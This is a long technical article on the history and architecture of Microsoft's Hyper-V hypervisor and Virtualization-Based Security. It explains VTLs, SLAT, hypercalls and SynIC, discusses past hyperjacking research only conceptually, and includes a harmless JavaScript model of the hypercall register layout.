In 2005, the team began a new project under the codename "Viridian." The goal was a Type-1 micro-kernelized hypervisor for x86-64 -- a fresh build, not a derivative of Virtual Server -- that required hardware virtualization extensions at install time. Intel's VT-x had shipped in November 2005 with the Pentium 4 662/672; AMD-V had shipped on May 23, 2006 with the Socket AM2 platform, initially available across Athlon 64 X2 and Athlon 64 FX and select Athlon 64 models. Both were now broadly enough deployed that Microsoft could make hardware virtualization a system requirement rather than a configuration option. Three years later, on June 26, 2008 (Wikipedia's body text gives this date; the infobox states June 28), Hyper-V reached RTM and was delivered as a Windows Server 2008 feature through Windows Update [@wp-hyperv].Microsoft ships two hypervisor binaries: hvix64.exe for Intel hosts (using VT-x) and hvax64.exe for AMD hosts (using AMD-V). The instruction-set-architecture divergence is real -- Intel uses vmcall to enter the hypervisor; AMD uses vmmcall -- but the hypercall ABI surface above that single instruction is identical, so the rest of the Microsoft hypervisor codebase is shared between the two binaries.

The 2008 design choices are worth naming individually because the ones that mattered for server consolidation turned out, twelve years later, to also be the ones that mattered for security. Three deserve flagging:

Micro-kernelized architecture. The hypervisor binary contains only the minimum machinery needed to virtualize the CPU, schedule VMs, and enforce memory isolation. It does not contain device drivers. It does not contain a network stack. It does not contain a filesystem.
Root partition plus child partitions. From the Microsoft architecture documentation: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install; the child partitions are guest VMs.
VMBus, VSP, and VSC. Inter-partition I/O happens over the VMBus -- a paravirtualized message channel. A Virtualization Service Provider (VSP) runs in the root partition and owns the real device; a Virtualization Service Client (VSC) runs in each child partition and talks to the VSP over VMBus. Device emulation lives in the root partition's user-mode and kernel-mode code, not in the hypervisor binary itself. This is the choice that, twelve years later, kept the hypervisor's Trusted Computing Base small enough to be defensible.

flowchart TD subgraph Root["Root partition (Windows Server)"] RD["Real device drivers"] VSP["Virtualization Service Providers"] VMM["VM Worker Processes (vmwp.exe)"] end subgraph Child1["Child partition 1 (guest OS)"] VSC1["Virtualization Service Clients"] Guest1["Guest kernel + apps"] end subgraph Child2["Child partition 2 (guest OS)"] VSC2["Virtualization Service Clients"] Guest2["Guest kernel + apps"] end HV["Microsoft Hypervisor (hvix64.exe / hvax64.exe)"] HW["Hardware (CPU, RAM, NIC, disk)"] Root -. VMBus .- Child1 Root -. VMBus .- Child2 Root --> HV Child1 --> HV Child2 --> HV HV --> HW

The micro-kernel, root-plus-child, and VMBus choices were defensible server engineering. Their server engineering rationale was that emulating a NIC, or a SCSI controller, or a graphics adapter inside a hypervisor binary would balloon the binary's size, lock its code-review cycles to those of every device the company shipped, and force the same security-critical code that scheduled CPUs to also handle Ethernet frame parsing. Putting device emulation in a normal Windows process inside the root partition -- the VM Worker Process vmwp.exe -- meant the hypervisor binary could stay small enough to reason about.

The 2008 design goal was, again, server consolidation. Microsoft's positioning materials at the time named "run more VMs per box, get better hardware use" as the customer pitch. Nothing in the 2008 Hyper-V documentation describes the hypervisor as a security primitive for the host OS. The security re-purposing -- the moment Hyper-V's hardware-privilege isolation became the way Windows itself protected its own kernel from itself -- did not arrive until 2015. To understand why it arrived at all, we have to back up thirty-four years to a 1974 paper that defined what virtualization formally requires.

3. The Theoretical Anchor -- Popek, Goldberg, and SLAT

Before Microsoft could build a hypervisor that ran security-critical code at a higher privilege than the Windows kernel, two unrelated decisions had to land. One was made in 1974, by two researchers who would never see Windows. The other was made in 2005, by Intel.

In July 1974, Gerald Popek of UCLA and Robert Goldberg of Harvard published "Formal Requirements for Virtualizable Third Generation Architectures" in Communications of the ACM. The paper laid down three properties any "true" virtual machine monitor must satisfy:

Equivalence. Programs run on the VMM exhibit behavior essentially identical to behavior on the bare machine, except for differences due to timing and resource availability.
Resource control. The VMM, not the guest, controls the system resources -- CPU time slices, memory, devices.
Efficiency. A statistically dominant subset of the instruction stream executes directly on hardware, without VMM intervention.

The theorem that gave the paper its lasting reputation followed from those properties. Let a sensitive instruction be one that either reads or modifies privileged state (the processor's mode bits, page-table base register, interrupt mask). Let a privileged instruction be one that traps when executed in user mode. Then a sufficient condition for an ISA to be virtualizable is that every sensitive instruction is privileged. The intuition is simple: the VMM must get a chance to see -- and to handle -- every guest action that touches the machine's privileged state. If the CPU silently lets the guest do something privileged-feeling without trapping, the VMM cannot maintain equivalence and control simultaneously.

A property of a processor architecture: every sensitive instruction in the instruction set is privileged. An architecture with this property can be virtualized "classically" -- with a thin trap-and-emulate hypervisor whose only entry points are the traps the CPU raises on privileged-instruction violations. An architecture without this property requires software workarounds (binary translation, paravirtualization) or hardware extensions (VT-x, AMD-V) before a Popek-Goldberg-style VMM can be built.

For three decades, x86 was famously not virtualizable in the Popek-Goldberg sense. John Robin and Cynthia Irvine enumerated the problem in their 2000 USENIX Security paper: seventeen protected-mode instructions on the IA-32 architecture either read or modified privileged state without trapping from user mode.The Robin and Irvine enumeration includes instructions like SGDT (store global descriptor table register), SIDT (store interrupt descriptor table register), SLDT (store local descriptor table register), SMSW (store machine status word), and PUSHF/POPF (push/pop flags including IOPL). Each of these silently returned or accepted privileged state from user mode without raising a fault. The aggregate effect was that no classical Popek-Goldberg VMM could correctly virtualize an unmodified x86 guest -- every one of those seventeen instructions was a hole the VMM could not see through. VMware Workstation, released in 1999 by VMware Inc. (which had been founded the year prior by Mendel Rosenblum, Diane Greene, Scott Devine, Ellen Wang, and Edouard Bugnion), worked around the problem with binary translation: it dynamically rewrote each protected-mode guest instruction stream to substitute or trap the seventeen offenders. The technique imposed double-digit overhead, made debugging miserable, and was a security liability in its own right -- the binary translator itself was a parser of arbitrary attacker-controlled code.

Intel and AMD ended the problem in hardware. Intel VT-x (codename Vanderpool, November 2005) and AMD-V (codename Pacifica, May 2006) added a new CPU mode -- VMX root operation for Intel, SVM host mode for AMD -- and a new instruction-emulation mechanism. A VM exit could be configured to fire on every sensitive instruction the hypervisor wished to intercept, transferring control to the host with a structured exit reason and an opaque, host-controlled snapshot of guest state. After 2006, x86-64 became Popek-Goldberg-virtualizable in hardware [@wp-x86-virtualization].

sequenceDiagram participant Guest as Guest OS (VMX non-root) participant CPU as CPU hardware participant HV as Hypervisor (VMX root) Guest->>CPU: MOV CR3, rax (sensitive instr) CPU->>HV: VM-EXIT (reason 28: CR access) HV->>HV: Read VMCS exit-qualification HV->>HV: Validate, emulate, update SLAT HV->>CPU: VMRESUME CPU->>Guest: Continue guest at next instruction

One architectural element more was needed before any of this could be a security primitive rather than just a virtualization primitive. Classical x86 paging maps a guest virtual address to a physical address through a single CPU-walked page table. In a virtualized system that single table cannot be enough, because the guest needs its own virtual-to-physical map and the host needs to remap the guest's "physical" address to a real machine-physical address. The first generations of VT-x simulated this two-level mapping in software through shadow page tables, which the hypervisor had to maintain alongside the guest's tables on every page-table edit. Shadow paging was correct but slow, and it gave the hypervisor no clean way to enforce a different memory map for different parts of the same guest.

Second-Level Address Translation (SLAT) -- Intel's Extended Page Tables (EPT, shipped with Nehalem in November 2008) and AMD's Nested Page Tables (NPT, shipped with the Barcelona-generation Opteron on September 10, 2007) -- solved both problems in hardware. The guest walks its own page table from virtual to "guest physical"; the CPU then walks a second, hypervisor-owned page table from "guest physical" to "system physical." Two key properties follow. First, the hypervisor has exclusive control of the second-level mapping; the guest cannot read, write, or even know that it exists. Second, because the second-level mapping is per-partition, the hypervisor can give two partitions different views of the same machine physical memory -- the same page can be readable in one partition and entirely absent in another.

A hardware feature on Intel (EPT) and AMD (NPT) CPUs that lets the hypervisor maintain a second page table mapping guest-physical addresses to system-physical addresses. The CPU walks the guest's own page table for the virtual-to-guest-physical mapping, then walks the hypervisor's table for the guest-physical-to-system-physical mapping. Because the second table is hypervisor-controlled and per-partition, the hypervisor can give different partitions -- and, in VBS, different Virtual Trust Levels inside the same partition -- different views of physical memory. SLAT is the bedrock of VTL memory protection [@ms-tlfs-pdf].

Hyper-V required VT-x or AMD-V at install time from day one. SLAT became mandatory with Windows Server 2016 and Windows 10 1607 [@ms-hyperv-architecture].

Popek and Goldberg gave us the property. Intel and AMD gave us the hardware. Microsoft used both to build a server hypervisor in 2008. But for the first seven years of Hyper-V's life, none of that machinery protected Windows from itself. Microsoft hadn't yet noticed the architectural problem that made it necessary -- or rather, they had noticed the problem (PatchGuard's bypass record was public) and had not yet conceded that the problem was structural. The concession came in 2015. What forced it was the same-privilege paradox.

4. The Same-Privilege Paradox -- Why PatchGuard Was Never Enough

PatchGuard, which Microsoft shipped in 2005 with Windows Server 2003 SP1 x64, ran inside ntoskrnl.exe at Ring 0 and scanned a curated list of kernel structures -- the system service dispatch table, the interrupt descriptor table, the kernel image's .text section -- at randomized intervals to detect tampering. It was bypassed within months by Skywing's Uninformed writeups. Microsoft kept shipping it. Researchers kept bypassing it. The pattern lasted a decade. The reason is not that PatchGuard's authors were sloppy [@wp-kpp]. The reason is structural, and naming it correctly is the first of the three insights this article is built around.

Key idea: Any defense reachable by mov from Ring 0 is defeasible by mov from Ring 0.

The intuition is simple. PatchGuard is a piece of code. It lives in the kernel's virtual address space at some page. It owns a timer that re-runs it periodically. It maintains a randomization seed for which structures it checks next. It has a callback path into KeBugCheckEx if it detects tampering. Every one of those four assets -- the code page, the timer callback, the randomization seed, the bug-check path -- is a kernel data structure or a kernel virtual address. An attacker with Ring-0 code execution can locate each of them by searching the same kernel address space PatchGuard searches. They can patch the callback so the timer no-ops. They can patch the seed so the randomization is predictable. They can patch the bug-check path so it reports success. They can do all of this with a sequence of plain mov instructions. PatchGuard cannot defend against this, because PatchGuard's defenses live in the same place its attacker's writes do.

PatchGuard and its attacker are colleagues, not adversaries. They share an office. The office is `ntoskrnl.exe`'s virtual address space, and there is no key on the door.

This is the same-privilege paradox. It is not an implementation bug. It does not yield to better obfuscation, more randomization, or harder-to-find timers. It is an architectural ceiling. A defense at privilege level $P$ cannot be enforced against an attacker who also runs at privilege level $P$, because the defender's state lives in the attacker's address space. The defender can be made expensive to find; it cannot be made impossible to find, because the attacker has the same instructions, the same address-space view, and the same MMU privileges as the defender.

Note: The same-privilege paradox is a property of where the defense lives, not of how clever the defense is. PatchGuard's authors did add randomization. They did add multiple decoy callbacks. They did add cryptographically derived integrity checks. None of those reductions changes the basic fact that the attacker, holding the same Ring-0 privilege, can locate and edit each of them. The architectural fix is not better PatchGuard. The architectural fix is moving the defender to a privilege level the attacker cannot reach.

Once the paradox is named, the defender's choice is binary. Either give up on having a defense at all -- treat Ring 0 as a free-fire zone where any malware that gets there has won -- or move the defender to a privilege level above Ring 0, at a hardware boundary the attacker's mov instructions cannot cross. Microsoft picked the second. It is the only architecturally honest choice.

To make it work, Microsoft needed three things. The first was a hypervisor already deployed on every Windows install. They had that since 2008. The second was a way to put a piece of Windows itself -- code, data, secrets -- inside the hypervisor's protection without spawning a separate VM, because spawning a separate VM doubles the system's resource cost and forces every Windows process to choose between living on the normal side or the secure side. That required an architectural idea that did not yet exist in 2010: a way to split a single partition into two privilege levels, each with its own SLAT mapping and its own register state. The third was a way to ensure the hypervisor itself could not be silently replaced or rolled back beneath the OS. That required a hardware-rooted measurement -- a DRTM event -- that the OS could attest to.

The architectural idea is the subject of section 6. The DRTM measurement is the subject of section 11. Both of them required a decade-long conversation about whether the hypervisor itself could be trusted at all -- a conversation that ran in parallel during the same years and that briefly seemed to argue the opposite case. We turn to that conversation next.

5. The Hyperjacking Era -- SubVirt, Blue Pill, and CloudBurst

While Microsoft was finishing Hyper-V, the security community was establishing that a hypervisor was not just a defense -- it was also the most powerful possible attacker against the OS sitting above it. Three demonstrations in three years made the point unmistakable.

SubVirt. In May 2006, Samuel King and Peter Chen at the University of Michigan, joined by Yi-Min Wang, Chad Verbowski, Helen Wang, and Jacob Lorch at Microsoft Research, presented "SubVirt: Implementing Malware with Virtual Machines" at IEEE S&P [@king-subvirt-2006]. Their construction was a Virtual Machine Based Rootkit (VMBR). A privileged installer running inside a legitimate OS installed a malicious VMM at boot time; on the next reboot, the malicious VMM ran first, brought up the original OS as a guest underneath it, and gained the privileged position of seeing every CPU instruction, every memory access, and every I/O the OS performed. The original OS had no architectural way to tell it was no longer the most-privileged software on the box. SubVirt was demonstrated against Windows XP (using Microsoft Virtual PC as the malicious VMM substrate) and against Linux (using VMware Workstation), specifically to show that the technique was not tied to any one operating system or any one hypervisor product.

Blue Pill. Three months later, at Black Hat USA 2006, Joanna Rutkowska of COSEINC demonstrated "Subverting Vista Kernel for Fun and Profit" [@wp-blue-pill]. Her tool, codenamed Blue Pill, took a step beyond SubVirt by doing the VMM insertion at runtime rather than at boot. The technique: a Ring-0 driver, running inside an already-booted Windows install on an AMD-V capable host, executed VMRUN against an attacker-controlled Virtual Machine Control Block (VMCB) whose initial state matched the current physical CPU. The CPU dropped out of SVM root mode and re-entered as a guest under the attacker's VMM. The OS continued running normally, with no boot-loader modification and no reboot.

By 2007, Rutkowska and Alexander Tereshkin returned to Black Hat USA with the more polished "IsGameOver(,) Anyone?" presentation, refining the technique and addressing the early critics' detection ideas [@wp-blue-pill].Rutkowska's marketing claim that Blue Pill was "100% undetectable" attracted a public counter-effort: in 2007, Edgar Barbosa, Nate Lawson, Peter Ferrie, and Tom Ptacek all proposed detection techniques relying on side channels (timing artifacts of trapped instructions, TSC skew, structural differences in how RDTSC behaves under VT-x). The claim softened in subsequent publications, but the underlying point survived: a hostile thin hypervisor below a victim OS can be made arbitrarily difficult to detect from inside that OS, and the only architecturally clean way to know what you are running under is to measure the boot chain before the OS starts.

CloudBurst. At Black Hat USA 2009, Kostya Kortchinsky of Immunity Inc. presented CLOUDBURST. It was the first publicly demonstrated arbitrary-code-execution guest-to-host escape against a commercial hypervisor: a heap overflow in VMware's emulated SVGA-II graphics adapter, tracked as CVE-2009-1244 [@nvd-cve-2009-1244]. A guest VM, executing entirely inside a VMware-managed user-mode process on the host, could overflow a buffer in that process and gain host code execution. CloudBurst's lasting operational lesson was not the specific bug but the attack surface: device emulation -- not the trap-and-emulate core of the hypervisor -- is the largest piece of guest-attacker-controlled code in any commercial VMM. Every Hyper-V guest-to-host escape Microsoft has shipped a patch for since 2018 lands in either this device-emulation surface or the hypercall input-validation surface that mediates the same kinds of structured guest-controlled input.

flowchart TD subgraph Before["Before hyperjacking"] OS1["Victim OS"] FW1["Firmware (UEFI)"] HW1["Hardware"] OS1 --> FW1 FW1 --> HW1 end subgraph After["After hyperjacking"] OS2["Victim OS (now a guest)"] VMM["Hostile VMM (SubVirt / Blue Pill)"] FW2["Firmware (UEFI)"] HW2["Hardware"] OS2 --> VMM VMM --> FW2 FW2 --> HW2 end

The three demonstrations established a difficult dual truth. The hypervisor is the most powerful defender against an OS-level attacker, and it is the most powerful attacker against an OS-level defender. The same primitive can play either role; which role it plays in any given system depends only on whose hypervisor it is and whether the OS above it can prove that. SubVirt-style attacks did not require Microsoft to invent anything new -- they only had to be a possibility -- to force Microsoft into a design constraint: any "hypervisor as security primitive" architecture has to start by being the only hypervisor on the box, with a measurement of the hypervisor binary recorded in a TPM platform configuration register so that any malicious VMBR underneath could be detected at attestation time. This is the role that System Guard Secure Launch (DRTM) plays in the architecture, and we will return to it in section 11.

Blue Pill (offense) and VBS (defense) are architecturally identical. Each is a thin Type-1 hypervisor that interposes between firmware and OS. Each owns the CPU's virtualization mode, the second-level page tables, and the IOMMU. Each is invisible to the OS unless the OS can prove what is underneath it. The only differences between them are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege. The defense is the offense, run by the right people, in the right order, and attested to.

By 2010 the security community had agreed: the hypervisor is the most powerful primitive in the system, and whoever owns the SLAT page tables owns the box. Joanna Rutkowska's Invisible Things Lab launched Qubes OS, an explicitly hypervisor-rooted security OS, on April 7, 2010 [@qubes-introducing-2010]. Microsoft owned the SLAT page tables. They had a hypervisor on every Windows install. They had a server-consolidation product. What they did not yet have was a reason to re-purpose any of it for security. The reason was already being filed at the United States Patent and Trademark Office. The priority date was September 17, 2013.

6. The Pivot -- VSM, VTLs, and the Hepkin-Kishan Patent

On September 17, 2013, David Hepkin and Arun Kishan filed United States patent application 14/186,415, which would issue on August 30, 2016 as US Patent 9,430,642 B2 [@us9430642b2-patent]. The patent's title, "Providing virtual secure mode with different virtual trust levels," reads like marketing now because the words it introduced -- "Virtual Trust Level," "VTL," "Virtual Secure Mode" -- became Microsoft's own canonical terminology. In 2013 the words did not exist. The patent describes, in 2013, exactly what Microsoft shipped twenty-two months later in Windows 10 build 10240 [@ms-tlfs-vsm].

The patent's claim language is unusually specific. It teaches a virtual-machine manager that makes "multiple different virtual trust levels available to virtual processors of a virtual machine"; it teaches that "different memory access protections (such as the ability to read, write, and/or execute memory) can be associated with different portions of memory (e.g., memory pages) for each virtual trust level"; and it teaches that "the virtual trust levels are organized as a hierarchy with a higher level virtual trust level being more privileged than a lower virtual trust level." Each of those phrases is now a feature of the shipping Microsoft hypervisor.

A hypervisor-managed privilege level inside a single partition. Each VTL has its own SLAT mapping (so the same machine page can be readable in one VTL and absent in another), its own virtual-processor register state (so a VTL transition is a context switch, not a procedure call), and its own interrupt subsystem (so interrupts targeted at one VTL do not preempt code running in another). VTLs are hierarchical: a higher VTL can read all of a lower VTL's memory, but not vice versa. The shipping Microsoft hypervisor implements two VTLs (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen [@ms-tlfs-vsm].

Windows 10 RTM on July 29, 2015, and Windows Server 2016, shipped VBS atop the existing Hyper-V hypervisor [@wp-windows-10]. The architectural innovation -- the thing the patent was for -- was that VTL0 (Normal world, containing the NT kernel, user mode, and LSASS) and VTL1 (Secure world, containing the Secure Kernel and Isolated User Mode trustlets) ran inside the same partition rather than in two separate partitions. VBS is not a second VM. It is a per-VTL SLAT split inside the root partition, plus a per-VTL register-state snapshot, plus a per-VTL interrupt delivery surface. The hypervisor switches SLAT contexts on VTL transitions, exactly as it would switch SLAT contexts on a partition switch -- but the switch happens inside a single partition's address space, so there is no extra VM scheduling and no extra OS image to manage.

flowchart TD subgraph Root["Root partition"] subgraph VTL0["VTL0 -- Normal world"] NT["NT kernel (ntoskrnl.exe)"] User["User mode (lsass.exe, applications)"] end subgraph VTL1["VTL1 -- Secure world"] SK["Secure Kernel (securekernel.exe)"] IUM["Isolated User Mode trustlets"] LSAISO["LSAISO.EXE"] VTPM["vTPM trustlet"] IUM --- LSAISO IUM --- VTPM end end HV["Microsoft Hypervisor (hvix64 / hvax64)"] HW["Hardware (CPU, RAM, IOMMU, TPM)"] VTL0 -. "Secure call (hypercall + SynIC)" .-> VTL1 VTL1 --> HV VTL0 --> HV HV --> HW

The Hyper-V Top-Level Functional Specification, chapter 15, names the architectural facts verbatim. "VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis." "Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels." "Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL's. Currently, only two VTLs are implemented." The C-level definition #define HV_NUM_VTLS 2 is published in the same specification [@ms-tlfs-vsm]. Two VTLs are what ships; the architecture has room for more.

VSM enables operating system software in the root and guest partitions to create isolated regions of memory for storage and processing of system security assets. Access to these isolated regions is controlled and granted solely through the hypervisor, which is a highly privileged, highly trusted part of the system's Trusted Compute Base (TCB). -- Microsoft, *Hyper-V Top-Level Functional Specification*, chapter 15 [@ms-tlfs-vsm]

This is the second insight the article is built around: VBS is not a re-architecture. It is a re-purposing. The hypervisor was already on every Windows install for unrelated reasons. The 2015 pivot did not require new hardware, new VMs, or new CPUs. It required a new way to organize what was already there -- two SLAT mappings instead of one, two register snapshots instead of one, a secure-call ABI on top of the SynIC -- and a Windows-side Secure Kernel binary to run inside the new VTL1 view. The patent gave the design its formal expression; the engineering had been waiting since 2008 for the right architectural insight.David Hepkin spent over a decade on the NT kernel architecture team before the VSM design; Arun Kishan was an NT kernel architect and is now Microsoft's Corporate Vice President for the Operating Systems Platform group. Neither is a virtualization specialist by background. Their patent is, in retrospect, a kernel-team idea about how to put a piece of the kernel itself behind a hardware boundary the kernel cannot cross -- exactly the kind of design that an architect who had lived inside ntoskrnl.exe for years would invent.

Alex Ionescu's Black Hat USA 2015 deck "Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture" reverse-engineered the entire VSM stack within four weeks of Windows 10 RTM [@ionescu-bh-2015]. The vocabulary Ionescu introduced has become the canonical research language for talking about VBS: VTL as "synthetic ring level managed by the hypervisor"; trustlets for the user-mode processes that run inside VTL1's Isolated User Mode; Signature Level 12 plus the IUM EKU 1.3.6.1.4.1.311.10.3.37 as the loader's signing requirement. Microsoft's own developer documentation now uses the same terms [@ms-iso-user-mode-trustlets].

The pivot, then, was not a sudden re-architecture. It was the cash-out of a deliberate multi-year engineering plan that began at least twenty-two months before Windows 10 RTM. To see what VBS actually enforces -- and which hypervisor primitive backs each piece of that enforcement -- we need to walk the hypervisor's public surface. There are five surfaces. They are the architectural body of the article.

7. Architecture Tour -- The Hypervisor's Public Surface

What does the Windows hypervisor actually look like as a piece of software? It is a small kernel, on the order of one to two hundred thousand lines of C and C++ by community estimate; Microsoft has not published a primary line count. It has five externally visible surfaces, all of which are documented in the Hyper-V Top-Level Functional Specification (TLFS) v6.0b [@ms-tlfs-pdf]. We walk them in turn.

7.1 Partitions, VMBus, and the VSP/VSC pair

A partition is the hypervisor's unit of isolation. From the Microsoft architecture page: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install with privileged hypercalls and direct access to hardware; each child partition is a guest VM with only the hardware the root has chosen to expose.

A guest VM does I/O over the VMBus. A network packet, for example, travels from the guest application down to the guest's Windows NDIS stack; through the synthetic NIC miniport driver (the VSC) in the guest's kernel; over the VMBus message channel; into the network VSP in the root partition; into the root's real NDIS stack; into the physical NIC driver; out the wire. The hypervisor's role in this chain is structural: it owns the VMBus message channel, the SynIC interrupts that notify the VSP and VSC of new traffic, and the per-partition SLAT mappings that decide which bytes either side can read.

The architectural implication is that device emulation lives in the root partition, not in the hypervisor binary. The TCB the hypervisor binary itself has to protect is narrow. The TCB the root partition's drivers have to protect is much wider -- but those drivers live in normal Windows kernel mode, where Microsoft has thirty years of tooling. This is why almost every public Hyper-V CVE since 2018 has landed in vmswitch.sys, storvsp.sys, or the NT Kernel Integration VSP, rather than in hvix64.exe itself.

Note: Putting device emulation in the root partition means the hypervisor binary does not need to parse Ethernet frames, SCSI commands, USB descriptors, or graphics-adapter command rings. The trade-off is that the root partition becomes part of the TCB -- a root-partition kernel-mode bug is a hypervisor-equivalent break -- but the small hypervisor binary itself can be reviewed, fuzzed, and reasoned about as a single piece of code.

7.2 The hypercall ABI

Hypercalls are how partitions request services from the hypervisor. The TLFS documents two flavors. A fast hypercall passes its parameters inline in CPU registers: on x64, rcx carries a 64-bit hypercall input value (the low 16 bits are the call code; the upper 48 bits are a control word with fields for the Fast flag, variable-header size, Rep Count, and Rep Start Index), rdx carries the first input parameter, and r8 carries the second. A slow hypercall instead passes the GPA (guest physical address) of an input-parameter page in rdx, and the GPA of an output-parameter page in r8; the actual parameter content lives in those pages. The instruction that triggers the hypercall is vmcall on Intel and vmmcall on AMD; the hypervisor maps both onto the same internal entry point [@ms-tlfs-pdf].

A guest-to-hypervisor call. The guest issues `vmcall` (Intel) or `vmmcall` (AMD); the CPU traps via VM-EXIT into the hypervisor in VMX root mode; the hypervisor reads the call code from `rcx`, reads the inputs from registers (fast) or from a GPA-pointed page (slow), services the request, writes outputs back, and returns via VM-ENTRY. Hypercalls are the only legitimate way for a partition to invoke hypervisor services [@ms-tlfs-pdf].

{// A JavaScript model of the rcx hypercall input value layout. // In a real hypercall the guest sets rcx, rdx, r8 and issues vmcall / vmmcall. function packHypercallInput({ callCode, fastFlag, varHeaderSize, isNested, repCount, repStartIdx }) { // rcx layout (TLFS section 3 "Hypercall Interface", verbatim bit map) // bits 0..15 Call Code // bit 16 Fast (1 = inline params in rdx/r8) // bits 17..26 Variable header size (in QWORDs) // bits 27..30 RsvdZ // bit 31 Is Nested // bits 32..43 Rep Count // bits 44..47 RsvdZ // bits 48..59 Rep Start Index // bits 60..63 RsvdZ let rcx = 0n; rcx |= BigInt(callCode) & 0xFFFFn; if (fastFlag) rcx |= 1n << 16n; rcx |= (BigInt(varHeaderSize) & 0x3FFn) << 17n; if (isNested) rcx |= 1n << 31n; rcx |= (BigInt(repCount) & 0xFFFn) << 32n; rcx |= (BigInt(repStartIdx) & 0xFFFn) << 48n; return rcx; } // HvCallPostMessage = 0x005C, fast hypercall (TLFS section 11) const rcx = packHypercallInput({ callCode: 0x005C, fastFlag: 1, varHeaderSize: 0, isNested: 0, repCount: 0, repStartIdx: 0, }); console.log('rcx = 0x' + rcx.toString(16).padStart(16, '0')); // Output: rcx = 0x000000000001005c}

The call-code space is small and well-documented: a few hundred codes, each one a structured request with typed inputs and outputs. The hypercall path is also where the most consequential 2024 Hyper-V CVE lived. CVE-2024-21407 was a use-after-free in hvix64.exe's handling of a specific file-operation hypercall, the rare case where the bug was in the hypervisor binary itself rather than in a root-partition driver [@nvd-cve-2024-21407].

7.3 Intercepts

Intercepts are how the hypervisor virtualizes guest behavior. The TLFS distinguishes four categories: instruction intercepts (CPUID, MSR reads/writes, I/O-port instructions), exception intercepts (page faults, general protection faults), memory-access intercepts (a guest tries to read or write a specific guest-physical-address region), and partition-state intercepts (a guest hits a state that the hypervisor wants to be notified about). Each is configured per-partition through the Intel VMCS execution-control bits or the AMD VMCB control fields [@ms-tlfs-pdf].

A configurable hypervisor notification on a specific guest event. The hypervisor programs the VMCS or VMCB to fire a VM-EXIT when the guest issues a particular instruction, raises a particular exception, accesses a particular memory region, or transitions to a particular state. Intercepts are the policy mechanism that lets the hypervisor implement device emulation, security checks, and VTL transitions [@ms-tlfs-pdf].

For VBS, the load-bearing intercept is the memory-access intercept. When VTL0 code tries to access a region whose VTL0 SLAT mapping is unreadable or unwritable, the access traps to the hypervisor with the offending GPA; the hypervisor can deliver the intercept to the VTL1 Secure Kernel as a secure call, letting VTL1 see what VTL0 was trying to do and decide whether to allow it. This is how HVCI's W^X enforcement is wired: a VTL0 page that is marked writable in VTL0's SLAT is marked non-executable in the same SLAT; an attempt to switch the same page to executable becomes a memory-access intercept that VTL1 must approve.

7.4 The Synthetic Interrupt Controller (SynIC)

The Synthetic Interrupt Controller, SynIC, is the hypervisor's per-virtual-processor event delivery surface. Each VP has 16 Synthetic Interrupt Source (SINT) lines, a message page (where the hypervisor places message-shaped events), an event-flag page (where it places bit-flag events), and a set of synthetic timers. SynIC is the bus on which VMBus traffic between VSP and VSC moves; it is also the bus on which VTL transitions between VTL0 and VTL1 are delivered inside the root partition [@ms-tlfs-pdf].

A hypervisor-emulated interrupt controller, parallel to the hardware APIC, that delivers hypervisor-originated events to a virtual processor. Each VP has 16 SINT lines, a message page, an event-flag page, and synthetic timers. VMBus signaling rides on SynIC; secure-call delivery between VTL0 and VTL1 rides on SynIC; vTPM, virtual-PCI, and other paravirtualized device events ride on SynIC [@ms-tlfs-pdf].

For VBS, the secure-call ABI -- the way VTL0 code asks VTL1 to do something -- is built on SynIC. A VTL0 caller writes a request into a shared message page, signals a SINT, and yields the CPU; the hypervisor switches SLAT context to VTL1, delivers the message, and lets VTL1 read the request. When VTL1 finishes, it signals a SINT back to VTL0 and the hypervisor switches contexts again. Credential Guard's whole communication path between VTL0 LSASS and VTL1 LSAISO is one of these secure-call channels.

7.5 Memory and per-VTL SLAT

The last surface is also the most important: memory. Guest physical addresses (GPAs) are translated to system physical addresses (SPAs) by per-partition SLAT page tables. The hypervisor has exclusive control of these tables; no partition, including the root, can read or modify them directly. For VBS specifically, the hypervisor maintains two SLAT mappings per partition -- one for VTL0 and one for VTL1 -- and switches between them on VTL transitions.

This is the architectural reason VTL0 kernel mode, even with full Ring-0 code execution, cannot read or execute VTL1 memory. The VTL0 page-table walker on a load from a VTL1-only page does not see the page at all; the SLAT walker on the host returns no mapping; the hardware MMU raises an EPT/NPT violation; the hypervisor handles the violation according to the VTL0 partition's intercept policy. In the security-relevant case, the hypervisor delivers an access-denied result to VTL0 and continues. There is no kernel-mode mov instruction sequence that can defeat this, because the gating happens in hardware page-table walks that VTL0 kernel mode cannot influence.

Five surfaces. Two of them -- the hypercall ABI and the device-emulation paths that surface over VMBus -- are where every public Hyper-V escape since 2018 has lived. The other three (intercepts, SynIC, per-VTL SLAT) are the substrate on which VBS, HVCI, Credential Guard, and System Guard Secure Launch are built. We turn to those next.

8. How the Hypervisor Enforces Each VBS Feature

The hypervisor itself does not know anything about credentials, code signing, application allowlisting, or DMA protection. It knows about partitions, VTLs, intercepts, SLAT entries, and hypercalls. Each Windows security feature is built by composing those primitives in a specific way. The mapping is precise and worth walking, because it is what makes the substrate a security primitive rather than just a virtualization product [@ms-hardware-root-of-trust].

HVCI / Memory Integrity. Hypervisor-protected Code Integrity is the most consequential VBS feature on a per-byte basis: it changes Windows from a system that lets the kernel execute any signed driver to one where the kernel cannot execute any page until VTL1 has approved it. VTL1's code-integrity service inspects every kernel-mode page mapping change request before the SLAT entry that would make the page executable in VTL0 is granted. The W^X invariant -- a single page can be writable or executable, but never both -- is enforced not by NT kernel cooperation but by the per-VTL SLAT, exactly as described in section 7.5. An NT-kernel attempt to mark a writable page executable becomes a memory-access intercept that VTL1's CI service evaluates [@ms-enable-vbs-hvci]. The hypervisor primitives composed: per-VTL SLAT + memory-access intercepts + secure-call ABI.

